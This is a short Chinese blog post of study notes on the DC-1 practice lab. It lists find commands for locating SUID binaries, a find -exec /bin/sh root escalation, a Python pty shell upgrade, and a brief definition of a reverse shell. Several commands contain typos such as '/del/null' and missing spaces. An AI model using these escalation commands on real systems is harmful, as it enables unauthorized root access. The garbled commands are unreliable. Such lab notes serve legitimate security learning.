靶场DC1过程总结

本文介绍了如何通过SUID权限提升到root用户,包括使用find命令查找具有SUID的文件和Python脚本的提权方法。同时讨论了反弹shell的概念以及连接数据库时遇到的加密问题,涉及PHP框架的应用。
摘要由CSDN通过智能技术生成

find获得权限的笔记

SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。

使用find命令查看拥有suid权限的文件

find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/del/null

按照刚刚学的

find text.sh -exec "/bin/sh" \;

所以这里的提权语句是   find / -name corn.php -exec "/bin/sh"\是找到名字为 corn.php的文件然后获取他的root权限

root用户是指唯一的超级用户

什么是反弹shell 反弹shell就是主机主动连接攻击机发送信息

sudo python -c 'import pty;pty.spawn("/bin/bash")'

这是python提权的常见姿势

成功

连接数据库

其实已经连接到use的数据库了 只是还是显示mysql

输入 showtables;

用户被加密

用的是php框架

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值